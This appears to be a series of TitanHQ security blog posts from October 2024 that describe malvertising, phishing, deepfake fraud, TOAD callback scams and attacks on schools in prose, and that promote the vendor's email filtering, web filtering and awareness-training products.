The adverts claim that these software solutions games and services are available free of charge, which is a red flag as the genuine products and services usually require a purchase or subscription. The advertisements are published via hijacked Facebook business accounts, which according to an analysis by Bitdefender, have been used to create thousands of ads on the platform, many of which remain active for months. If a user interacts with one of the adverts, they are directed to sites hosted on Google Sites or True Hosting. Those sites impersonate trusted brands and offer the application indicated in the initial ad. If the user is tricked and progresses to a download, a zip file is delivered that contains an executable file that sideloads a malicious DLL, which launches the infection process.
The DLL will run PowerShell commands that will prevent the malware from executing in sandboxes and will prepare the environment for the malware to be installed, including disabling security solutions to ensure the malware is not detected, and maintaining persistence ensured through scheduled tasks. Some identified samples include an Electron application with JavaScript code embedded that drops and executes the malware.
The cybercriminals behind the campaign respond to detections of the malware by security solutions and change the code when the malware starts to be blocked, with the new variant rapidly pushed out via Facebook ads. The information stealer primarily targets Facebook business accounts and steals credentials allowing those accounts to be hijacked. Personal data is stolen, and the accounts are used to launch more malicious ads. Since legitimate Facebook business accounts are used, the attackers can launch malicious ads at scale without arousing suspicion. This malvertising campaign stands out due to its scale, with around 100 malicious domains currently used for malware distribution and command and control operations.
Businesses should take steps to ensure they are protected by using a web filter to block the malicious domains used to distribute the malware, the Facebook site for employees, and to prevent malware downloads from the Internet. Since business Facebook accounts are targeted, it is important to ensure that 2-factor authentication is enabled in the event of credentials being compromised and business Facebook accounts should be monitored for unauthorized access. Business users should not install any software unless it comes from an official source, which should be reinforced through security awareness training.
TitanHQ has developed an easy-to-use web filter called WebTitan that is constantly updated with threat intelligence to block access to malicious sites as soon as they are discovered. WebTitan can be configured to block certain file downloads from the Internet by extension to reduce the risk of malware infections and control shadow IT, and WebTitan makes it easy for businesses to enhance productivity while improving security by blocking access to known distractions such as social media platforms and video streaming sites. WebTitan provides real-time protection against clicks in phishing emails by preventing a click from launching a malicious website and the solution can be used to protect all users on the network as well as off-network users on portable devices through the WebTitan on-the-go roaming agent. For more information about improving your defenses against malware delivered via the internet and malvertising campaigns, give the TitanHQ team a call today.
by titanadmin | Oct 30, 2024 | Phishing & Email Spam, Security Awareness |
Several new campaigns have been detected in recent weeks that use diverse tactics to trick people into disclosing sensitive information and installing malware.
Cybercriminals Target Crypto Wallets via Webflow Sites
Webflow is a software-as-a-service company that businesses can use to accelerate website development. The platform makes it easier to create websites and web pages, simplifying and eliminating many of the complex tasks to speed up website creation. Cybercriminals have taken advantage of the platform and are using it to rapidly spin up phishing pages and create pages to redirect users to malicious sites. One of the main advantages of Webflow compared to alternative platforms is the ease of creating custom subdomains, which can help phishers make their phishing pages more realistic. Subdomains can be created to mimic the login pages that they are impersonating, increasing the probability that individuals will be fooled into disclosing their credentials.
The number of detected phishing pages on Webflow has increased sharply, especially for crypto scams. One of the campaigns impersonated the Trezo hardware wallet. Since the subdomain can be customized to make the phishing page appear official, and screenshots of the actual Trexor site are used, these phishing pages can be very convincing. In these campaigns, the aim is to steal the seed phrases of the victim to allow the threat actor to access cryptocurrency wallets and transfer the funds. In one campaign, when the seed phrase is disclosed, the user is told their account has been suspended for unauthorized activity and they are told to launch a chat service for support. The chat service is manned by the threat actor who keeps the victim engaged while their wallet is emptied.
Hackers Use Deepfakes to Target Finance Professionals
The cost of artificial intelligence (AI) solutions is falling and cybercriminals are taking advantage. AI is increasingly being used to manipulate images, audio, and video recordings to make their scams more convincing. These deepfakes are realistic and more effective at tricking individuals into making fraudulent wire transfers than business email compromise scams, as they include deepfake videos of the person being spoofed. Cybercriminals use AI tools to create deepfakes from legitimate video presentations and webinars, impersonating an executive such as the CEO or CFO in an attack on finance team members. The aim is to trick the employees into making a wire transfer. Earlier this year, the engineering group Arup was targeted using a deepfake of the company CFO, and $25 million was transferred to the scammers in transfers to five different bank accounts.
Vendors are often spoofed in deepfake scams to trick their clients into wiring payments to attacker-controlled bank accounts. A recent survey by Medius revealed that 53% of finance professionals in the UK and US had experienced at least one attempted deepfake scam. These scams may occur over the phone, with the deepfake occurring in real-time, and there have been many cases of deepfake impersonations over video conferencing platforms such as Microsoft Teams and Zoom.
North Korean Hackers Target Developers with Fake Job Interviews
The North Korean hacking team, Lazarus Group, is known to use diverse tactics in its attacks. The group has now been observed infiltrating business networks by obtaining positions as IT workers. According to Mandiant, dozens of Fortune 100 companies have been tricked into hiring workers from North Korea, who steal corporate data after being hired. One UK firm discovered they had been duped 4 months after employing an It worker who was actually based in North Korea. The IT worker used the network access provided to siphon off sensitive data, and when the worker was sacked for poor performance, demanded a ransom to return the stolen data. Researchers believe the data was provided to North Korea.
The Lazarus Group has also been targeting developers through fake interviews. The group hosts fake coding assessments on legitimate repositories such as GitHub and hides malicious code in those repositories, especially in Python files. The developers are tricked into downloading the code and are tasked with finding and fixing a bug but will inadvertently execute the malicious code regardless of whether they complete the assessment. The hackers often pose as legitimate companies in the financial services.
Legitimate File-Hosting Services Used for Phishing Attacks and Malware Distribution
One of the ways that cybercriminals attempt to bypass filtering mechanisms is to use legitimate hosting services for phishing and malware delivery. Dropbox, OneDrive, Google Drive, and SharePoint are all commonly used by cybercriminals. These services are used by businesses for storing and sharing files and for collaboration, so these services are often trusted. They are also often trusted by security solutions. Tactics commonly used include sharing links to files hosted on these services via phishing emails, often restricting access to the files to prevent detection by security solutions. For instance, the user is required to be logged in to access the file. Files may be hosted in view-only mode to avoid detection by security solutions, with social engineering techniques used to fool the user into downloading the files.
Cybercriminals are constantly evolving their tactics to phish for credentials, distribute malware, and gain unauthorized access to sensitive data. Businesses need to adopt a defense-in-depth approach to security, adding several layers to their defenses to combat new threats. These measures include an advanced spam filtering service with machine learning capabilities and email sandboxing, a web filter for blocking access to malicious websites and preventing malware downloads from the Internet, anti-phishing solutions for Microsoft 365 environments to block the threats that Microsoft often fails to detect, and comprehensive security awareness training for the workforce.
Cybercriminals will continue to evolve their tactics, so security solutions should also be able to evolve and be capable of detecting zero-day threats. With TitanHQ as your security partner, you will be well protected against these rapidly changing tactics. Give the TitanHQ team a call today to find out more about improving your technical and human defenses against these threats.
by titanadmin | Oct 28, 2024 | Phishing & Email Spam |
For many years, cybercriminals have favored Office documents for distributing malware. These documents are familiar to most workers and are likely to be opened because they are so familiar and used so often. The documents may contain hyperlinks to malicious websites where malware is downloaded, but the easiest method is automating the delivery of malware using a malicious macro. If that macro is allowed to run, the infection process will be triggered.
Microsoft has helped to make documents and spreadsheets more secure by disabling macros by default if they have been delivered via the Internet and increasing numbers of companies are providing workforce security awareness training and instructing their employees not to enable content on Office documents delivered via the Internet. It has become much harder for cybercriminals to distribute malware using these file formats, so they have turned to script languages for malware delivery.
The use of VBScript and JavaScript in malware distribution campaigns has been increasing, with these executable files often hidden from security solutions by adding them to archive files. The scripts used in campaigns are snippets of code that include command sequences, which automate the downloading and execution of malware, often only operating within the system’s memory to avoid detection. The user is likely to be unaware that malware installation has been triggered.
For example, in one campaign, a malicious VBS script was hidden in an archive file to evade email security defenses. If extracted and executed, the script executes PowerShell commands, which can be difficult for security solutions to identify as malicious. PowerShell triggered the BitsTransfer utility to fetch another PowerShell script, which downloaded and decoded Shellcode, which in turn loaded a second shellcode that used the Windows wab.exe utility to download an encrypted payload. The shellcode decrypted and incorporated the payload into wab.exe, turning it into the remote access trojan, Remcos RAT. This multi-stage infection process used living-off-the-land techniques to evade security solutions, and it all started with an email that used social engineering to trick the recipient into executing the script.
Using this attack as an example, there are opportunities for identifying the email for what it really is. Businesses need to ensure they have advanced email security defenses in place such as an advanced spam filter for Office 365 or a machine-learning/AI-driven spam filtering service. These services perform standard checks of inbound email, such as anti-spoofing and reputation checks on the sender, Bayesian analysis to determine whether the email is likely to be spam, but also machine learning checks, where the inbound message is compared against the emails typically received by a business and is flagged if any irregularities are found.
Anti-virus scans are useful for detecting malware, but these checks can often be evaded by adding malicious scripts to archive files, and the multi-stage process involved in infection is often sufficient to defeat signature-based malware detection. An email security solution therefore needs to also use email sandboxing. All attachments capable of being used for malicious purposes are scanned with an anti-virus engine and are then sent to the sandbox for deep analysis. Malware sandboxing for email is important, as it detects malware not by its signature, but by its behavior, which is vital for identifying script-based malware delivery. While there are sandboxing message delays, it prevents many costly malware infections.
SpamTitan, TitanHQ’s cloud-based anti-spam service, incorporates these checks to provide exceptional malware detection. In recent independent tests, SpamTitan blocked 100% of malware and had a 99.99% phishing catch rate and a 0.000% false positive rate. In addition to using an advanced spam filter, businesses can further reduce risk by blocking delivery of the 50 or so archive file formats supported by Windows if they are not used by the business.
It is also important to provide continuous security awareness training to the workforce to improve awareness of threats and the new tactics, techniques, and procedures being used by threat actors to trick individuals into providing them with network access. This is easily down with TitanHQ’s SafeTitan security awareness training platform solution, especially when combined with phishing simulations.
Cyberattacks targeting individuals are increasing in sophistication and standard security defenses are often evaded. To find out more about improving your defenses against sophisticated phishing, malware, and business email compromise threats, give the TitanHQ team a call. Improving your defenses is likely to be much cheaper than you think.
by titanadmin | Oct 26, 2024 | Security Awareness |
Managed service providers can implement security solutions to protect their clients from phishing, social engineering, and business email compromise attacks but if a malicious email manages to bypass those defenses, it could easily result in hackers gaining a foothold in the network, resulting in a highly disruptive and costly cyberattack and data breach. To improve defenses against phishing, managed service providers should offer their clients security awareness training to manage human risk, and now TitanHQ can offer a security awareness training (SAT) solution that allows them to do that with ease.
This month, TitanHQ launched its Security Awareness Training (SAT) solution for MSPs. The solution has been specifically created to be used by MSPs and allows them to provide affordable, scalable training with minimal setup. The training platform has now been integrated with TitanHQ’s MSP cybersecurity platform and is ready for MSPs to use. In contrast to many SAT solutions that only provide standard cybersecurity training, TitanHQ’s SAT solution integrates advanced phishing simulation with behavior-focused training that is fun and engaging for participants. The solution delivers maximum value to MSPs and can be rapidly set up, allowing them to roll out training programs to new clients with just a few clicks. There is no need to spend hours assigning training content to new customers, as it is possible to select multiple customers and rapidly spin up training courses that can be rapidly deployed for individuals or groups of customers in the future.
The AI-driven training platform allows training content to be tailored to individual employees to meet their training needs, personalizing the training experience. The platform includes more than 80 videos, training sessions, and webinars to improve awareness and help create a security culture. MSPs are provided with monthly reports on the progress that is being made by individual employees and they are provided with actionable insights.
The platform includes a phishing simulator that allows MSPs to conduct real-time phishing simulations based on a huge variety of templates (1,800+) covering all types of phishing and other attack scenarios, and the content is updated regularly to include the latest tactics, techniques, and procedures used by cybercriminals in real-world phishing campaigns. MSPs can easily pre-configure phishing simulations and training campaigns to roll out to new clients as they are onboarded, and the MSP dashboard provides a view of quick actions and live analytics all in one place.
The training platform can deliver reactive training in response to user behavior, where users in need of training are automatically enrolled and delivered relevant training content. MSPs can use the platform to conduct cyber awareness knowledge checks to identify areas where individuals need training, verify understanding of the training material, and retest employees over time to ensure they have not forgotten the material from previous training sessions. The training material covers the cyber threats that employees are likely to encounter such as phishing, social engineering, business email compromise, and malware, but also in-person threats such as physical security, ensuring they receive comprehensive training that covers all the bases.
If you have yet to start offering security awareness training to your clients, or if you already offer training but require a more comprehensive and easier-to-use training platform, give the TitanHQ team a call. Product demonstrations can be arranged on request to show you just how easy the platform is to use.
“Our integrated cybersecurity platform delivers maximum value to MSPs, offering a quicker time-to-market, reduced set-up requirements combined with real-world, practical security awareness training & phishing simulations. TitanHQ delivers that seamlessly, allowing MSPs to offer comprehensive SAT to their customers in just a few clicks,” said TitanHQ CEO, Ronan Kavanagh.
by titanadmin | Oct 26, 2024 | Phishing & Email Spam |
The purpose of phishing attacks is usually to steal credentials to gain unauthorized access to accounts. If an employee falls for a phishing attack and their credentials are obtained, the attacker can gain access to that user’s account and any data contained therein. That access can be all that is required for the threat actor to achieve a much more extensive compromise.
Oftentimes, a threat actor conducts a more extensive phishing campaign on multiple employees at the same organization. These phishing attacks can be harder to spot as they have been tailored to that specific organization. These attacks usually spoof an internal department with the emails seemingly sent from a legitimate internal email account. The emails may address each individual by name, or appear to be broadcast messages to staff members. One successful campaign was identified by the Office of Information Technology at Boise State University, although not before several employees responded to the emails and disclosed their credentials. In this campaign, the emails were addressed to “Dear Staff,” and appeared to have been sent from the postmaster account by “Health Services,” purporting to be an update on workplace safety. The emails had the subject line “Workplace Safety: Updates on Recent Health Developments,” with a similar campaign indicating a campylobacter infection had been reported to the health department.
In the message, recipients were advised about a health matter involving a member of staff, advising them to contact the Health Service department if they believed they had any contact with the unnamed worker. In order to find out if they had any contact with the worker, the link must be clicked. The link directed the user to a fraudulent login page on an external website, where they were required to enter their credentials. The login page had been created to look like it was a legitimate Boise State University page, captured credentials, and used a Duo Securit notification to authorize access to their account.
These targeted campaigns are now common, especially at large organizations where it is possible to compromise a significant number of accounts and is worth the attacker’s time to develop a targeted campaign. Another attack was recently identified by the state of Massachusetts. The attacker created a fake website closely resembling the HR/CMS Employee Self-Service Time and Attendance (SSTA) system, which is used for payroll. Employees were tricked into visiting the portal and were prompted to enter their credentials, which the attacker used to access their personal and direct deposit information. In this case, the aim of the attack appeared to be to change direct deposit information to have the employees’ wages paid into the attacker’s account. Several employees were fooled by the scam; although in this case the attack was detected promptly and the SSTA system was disabled to prevent fraudulent transfers.
A different type of campaign recently targeted multiple employees via email, although the aim of the attack was to grant the threat actor access to the user’s device by convincing them to install the legitimate remote access solution, AnyDesk. The threat actor, the Black Basta ransomware group, had obtained employee email addresses and bombarded them with spam emails, having signed them up for newsletters via multiple websites. The aim was to create a legitimate reason for the next phase of the attack, which occurred via the telephone, although the group has also been observed using Microsoft Teams to make contact. The threat actor posed as the company’s IT help desk and offered assistance resolving the spam problem they created, which involved downloading AnyDesk and granting access to their device. During the session, tools are installed to provide persistent access. The threat actor then moved laterally within the network and extensively deployed ransomware.
These attacks use social engineering to exploit human weaknesses. In each of these attacks, multiple red flags should have been spotted revealing these social engineering attempts for what they are but more than one employee failed to spot them. It is important to provide security awareness training to the workforce to raise awareness of phishing and social engineering threats, and for training to be provided regularly. Training should include the latest tactics used by threat actors to breach networks, including phishing attacks, fake tech support calls, malicious websites, smishing, and vishing attacks.
A phishing simulator should be used to send realistic but fake phishing emails internally to identify employees who fail to spot the red flags. They can then receive additional training relative to the simulation they failed. By providing regular security awareness training and conducting phishing simulations, employers can develop a security culture. While it may not be possible to prevent all employees from responding to a threat, the severity of any compromise can be limited. With TitanHQ’s SafeTitan solution, it is easy to create and automate tailored training courses and phishing simulations that have been shown to be highly effective at reducing susceptibility to phishing and other threats.
Since threat actors most commonly target employees via email, it is important to have robust email defenses to prevent the threats from reaching employees. Advanced anti-spam services such as SpamTitan incorporate a wide range of threat detection methods to block more threats, including reputation checks, extensive message analysis, machine-learning-based detection, antivirus scans, and email sandboxing for malware detection. SpamTitan has been shown to block more than 99.99% of phishing threats and 100% of malware.
by titanadmin | Oct 24, 2024 | Phishing & Email Spam |
Phishing is one of the most effective methods used by cyber actors to gain initial access to protected networks Phishing tactics are evolving and TOAD attacks now pose a significant threat to businesses. TOAD stands for Telephone-Oriented Attack Delivery and is a relatively new and dangerous form of phishing that involves a telephone call, although there are often several different elements to a TOAD attack which may include initial contact via email, SMS messages, or instant messaging services.
TOAD attacks often start with an information-gathering phase, where the attacker obtains personal information about individuals that can then be targeted. That information may only be a mobile phone number or an email address, although further information is required to conduct some types of TOAD attacks.
One of the most common types of TOAD attacks is callback phishing. The attacker impersonates a trusted entity in an email and makes a seemingly legitimate request to make contact. There is a sense of urgency to get the targeted individual to take prompt action. Rather than use a hyperlink in the message to direct the user to a website, the next phase of the attack takes place over the telephone or a VOIP-based service such as WhatsApp. A phone number is included that must be called to resolve a problem.
If the call is made, the threat actor answers and during the call, trust is built with the caller and the threat actor makes their request. That could be an instruction to visit a website where sensitive information must be entered or a file must be downloaded. That file download leads to a malware infection.
Several TOAD attacks have involved the installation of legitimate remote access software. One campaign involved initial contact via email about an expensive subscription that was about to be renewed, which required a call to cancel. The threat actor convinces the user to download remote access software which they are told is necessary to prevent the charge being applied, such as to fully remove the software solution from the user’s device.
The user is convinced to give the threat actor access to their device through the software and the threat actor keeps the person on the line while they install malware or perform other malicious actions, reassuring them if they get suspicious. Other scams involve initial contact about a fictitious purchase that has been made, or a bank scam, where an email impersonates a bank and warns the victim that an account has been opened in their name or a large charge is pending. These attacks result in the victim providing the threat actor with the information they need to access their account.
TOAD attacks often involve the impersonation of a trusted individual, who may be a colleague, client, or even a family member. Since information is gathered before the scam begins, when the call is made, the threat actor can provide that information to the victim to convince them that they are who they claim to be. That information may have been purchased on the dark web or obtained in a previous data breach. For instance, following a healthcare data breach, the healthcare provider may be impersonated, and the attacker can provide medical information in their possession to convince the victim that they work at the hospital.
The use of AI tools makes these scams even more convincing. Deepfakes are used, where a person’s voice is mimicked, or video images are manipulated on video conferencing platforms. Deepfakes were used in a scam on an executive in Hong Kong, who was convinced to transfer around £20 million in company funds to the attacker’s account, believing they were communicating with a trusted individual via a video conferencing platform.
TOAD attacks may be solely conducted over the phone, where the attacker uses call spoofing to manipulate the caller ID to make it appear that the call is coming from a known and previously verified number. Other methods may be used to convince the victim that the reason for the call is genuine, such as conducting a denial-of-service attack to disrupt a service or device to convince the user that there is an urgent IT problem that needs to be resolved. TOAD attacks are increasing because standard phishing attacks on businesses are becoming harder to pull off due to email security solutions, multifactor authentication, and improved user awareness about scam messages.
Unfortunately, there is no single cybersecurity solution or method that can combat these threats. A comprehensive strategy is required that combines technical measures, security awareness training and administrative controls. Advanced anti-spam software with machine learning and AI-based detection can identify the emails that are used for initial contact. These advanced detection capabilities are needed because the initial emails often contain no malicious content, other than a phone number. SpamTitan, TitanHQ’s cloud-based anti-spam service, can detect these initial emails through reputation checks on the sender’s IP address, email account, and domain, and machine learning is used to analyze the message content, including comparing emails against the typical messages received by a business.
WebTitan is a cloud-based DNS filter that is used to control the web content that users can access. WebTitan will block access to known malicious sites and can be configured to prevent certain file types from being downloaded from the internet, such as those commonly used to install malware, unauthorized apps, and remote access solutions.
Regular security awareness training is a must. All members of the workforce should be provided with regular security awareness training and TOAD attacks should feature in the training content. SafeTitan, TitanHQ’s security awareness training platform and phishing simulator, makes it easy for businesses to create and automate training courses for the workforce. Employees should be trained in how to identify a TOAD attack, told not to trust caller ID alone, to avoid clicking links in emails and SMS messages, and to be vigilant when receiving or making calls, and to report any suspicious activity and immediately end a call if something does not seem right.
by titanadmin | Oct 20, 2024 | Industry News, Network Security, Security Awareness |
Schools and higher educational institutions have long been a target for cybercriminals and attacks are on the increase. Educational institutions store large amounts of sensitive data on their students, which can include health and financial data – information that can be easily monetized. The data can be sold on the dark web to identity thieves and can be used for a range of fraudulent purposes.
Like the healthcare sector, which is also extensively targeted by malicious actors, educational institutions often have a complex mix of modern and legacy IT systems and securing those systems can be a challenge while ensuring they remain accessible to authorized individuals, especially when there is often a limited budget for cybersecurity. There are also non-technical vulnerabilities. Schools employ a diverse range of individuals including teaching and support staff and networks are accessed by students of a range of ages. Cybersecurity awareness can vary greatly among network users. The combination of vulnerabilities means the sector is relatively easy to attack.
According to a recent report from Microsoft, schools in the United States are being used by malicious actors to test their tactics, techniques, and procedures. Microsoft Threat Intelligence data indicates education is the third-most targeted sector in the United States and attacks are also increasing in the United Kingdom, especially higher education institutions where 43% of surveyed institutions said they experience a cyberattack or data breach at least weekly. In Q2, 2024, the education sector was also on a par with healthcare, information technology, telecommunications, consumer retail, and transportation sectors for ransomware attacks, each accounting for 11% of attacks in the quarter.
It is not only cybercriminal groups that target the education sector. Several state-sponsored hacking groups are targeting universities to gain access to connections and steal IP. Universities are commonly engaged in cutting-edge research and often work closely with government agencies. Nation state hacking groups target intellectual property to further research in their native countries, and it can be a lot easier to target individuals in the education sector and use their accounts to pivot to attack their contacts, which may include high-level individuals in a range of private sector industries, as well as the defense sector.
Microsoft has tracked attacks on the education sector by Iranian threat groups such as Mint Sandstorm and Peach Sandstorm, both of which conduct sophisticated phishing and social engineering attacks. North Korean hacking groups also target the U.S. education sector, with groups tracked by Microsoft as Emerald Sleet and Moonstone Sleep using novel techniques to install malware to gain access to the networks of educational institutions.
While vulnerabilities in software and operating systems can be exploited, phishing and social engineering attacks are much more commonly used to steal credentials and install malware, so it is essential that educational institutions have robust defenses against these types of attacks.
Advanced anti-spam software is essential for blocking phishing and social engineering attacks. In independent tests, SpamTitan has been shown to block 100% of malware thanks to twin antivirus engines and email sandboxing, and 99.99% of spam and phishing emails thanks to a barrage of checks and tests, including machine learning and AI-driven detection.
Many threats are delivered via the Internet, so it is vital to block access to malicious sites. WebTitan is a DNS-based web filtering solution for educational institutions that blocks access to malicious sites, prevents malware downloads from the Internet, and is used by schools to restrict the types of websites that staff and students can access to better protect students from harmful web content and comply with government regulations.
Security awareness training is also important to improve human defenses. TitanHQ’s SafeTitan training platform allows educational institutions to easily create training courses for staff and students, and test knowledge of social engineering and phishing through an easy-to-use phishing simulator.
Cybercriminals and nation state actors are likely to continue to target the education sector, so it is important to have the right defenses in place. Give the TitanHQ team a call today to find out more about improving your defenses against increasingly sophisticated cyber threats.
